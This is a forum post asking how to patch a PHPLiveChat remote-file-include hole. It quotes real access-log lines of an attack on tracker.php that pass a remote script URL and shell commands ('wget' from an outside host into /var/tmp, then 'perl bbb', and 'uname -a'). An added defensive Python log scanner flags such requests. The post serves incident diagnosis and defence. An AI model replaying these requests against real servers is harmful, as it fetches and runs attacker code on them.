PHPLiveChat - Security Hole

200.138.208.43 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bbb HTTP/1.1" 200 580 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:23:50 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bnc.conf HTTP/1.1" 200 591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:24:09 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;perl%20bbb HTTP/1.1" 200 62 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:38:42 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=uname%20-a HTTP/1.1" 200 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:39:07 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/lol.txt HTTP/1.1" 200 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


One of my clients just got hacked like that. Is there any way to close that security bug in PHPLiveChat? Any way to block those kinds of requests using mod_rewrite or something temporarily (like blocking "wget" in URLs)?

- Matt
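As an added example (not from the original post and not PHPLiveChat's own code), a small Python scanner that parses Apache combined-format access logs laid out like the lines quoted above and flags the two traits that make those requests recognisable: a query parameter whose value is a remote URL (the remote file include) and a parameter carrying shell commands such as wget or perl. The sample log lines are constructed with placeholder addresses (192.0.2.10, attacker.invalid).

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" log format, the same layout as the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tokens that have no business in a chat tracker's query string.
SHELL_TOKENS = ("wget", "curl", "perl", "uname", "/var/tmp", ";")

def analyze_line(line):
    """Return a findings dict for one log line, or None if it parses clean.
    'rfi' maps parameter -> remote URL, 'cmd' maps parameter -> shell-looking value."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    target = urlsplit(m.group("target"))
    findings = {"ip": m.group("ip"), "ts": m.group("ts"), "path": target.path,
                "status": int(m.group("status")), "rfi": {}, "cmd": {}}
    # Split on '&' only: older parse_qs versions also split on ';', which would
    # hide the 'cd ...;wget ...' command chain we want to see.
    for pair in target.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if re.match(r"(?i)^(https?|ftp)://", value):
            findings["rfi"][name] = value
        if any(tok in value for tok in SHELL_TOKENS):
            findings["cmd"][name] = value
    return findings if (findings["rfi"] or findings["cmd"]) else None

def scan_log(text):
    """Run analyze_line over every non-empty line and return the hits."""
    return [f for f in map(analyze_line, text.splitlines()) if f]

# Constructed sample: two requests shaped like the ones in the post (placeholder
# addresses) and one ordinary tracker request that must not be flagged.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://attacker.invalid/shell.txt?&cmd=cd%20/var/tmp/;wget%20attacker.invalid/bot HTTP/1.1" 200 580 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [02/Aug/2004:17:38:42 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://attacker.invalid/shell.txt?&cmd=uname%20-a HTTP/1.1" 200 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [02/Aug/2004:17:40:00 -0400] "GET /asp/tracker.php?uid=42&action=initst HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], "rfi=%s cmd=%s" % (hit["rfi"], hit["cmd"]))
```

A status of 200 on a flagged line means the script accepted the request, so those hosts are the ones to check first for dropped files in /var/tmp.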
